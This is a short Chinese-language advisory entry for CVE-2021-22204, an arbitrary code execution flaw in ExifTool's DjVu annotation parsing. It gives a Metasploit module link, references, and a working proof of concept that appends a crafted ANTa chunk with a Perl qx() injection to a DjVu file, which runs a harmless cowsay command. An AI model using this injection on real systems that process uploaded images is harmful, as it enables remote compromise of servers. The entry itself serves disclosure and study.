# ExifTool 任意代码执行漏洞 (CVE-2021-22204)


ExifTool 7.44及更高版本中，对DjVu文件格式中的用户数据进行不正确的中和，允许在解析恶意图像时执行任意代码。

Metasploit module:https://github.com/rapid7/metasploit-framework/pull/15185

poc：

```
$ printf 'P1 1 1 0' > moo.pbm
   $ cjb2 moo.pbm moo.djvu
   $ printf 'ANTa\0\0\0\40"(xmp(\\\n".qx(cowsay pwned>&2);#"' >> moo.djvu
   $ exiftool moo.djvu > /dev/null
    _______
   < pwned >
    -------
           \   ^__^
            \  (oo)\_______
               (__)\       )\/\
                   ||----w |
                   ||     ||
```

ref:

* https://nvd.nist.gov/vuln/detail/CVE-2021-22204
* https://twitter.com/wcbowling/status/1385803927321415687
* https://www.openwall.com/lists/oss-security/2021/05/10/5
* https://github.com/se162xg/CVE-2021-22204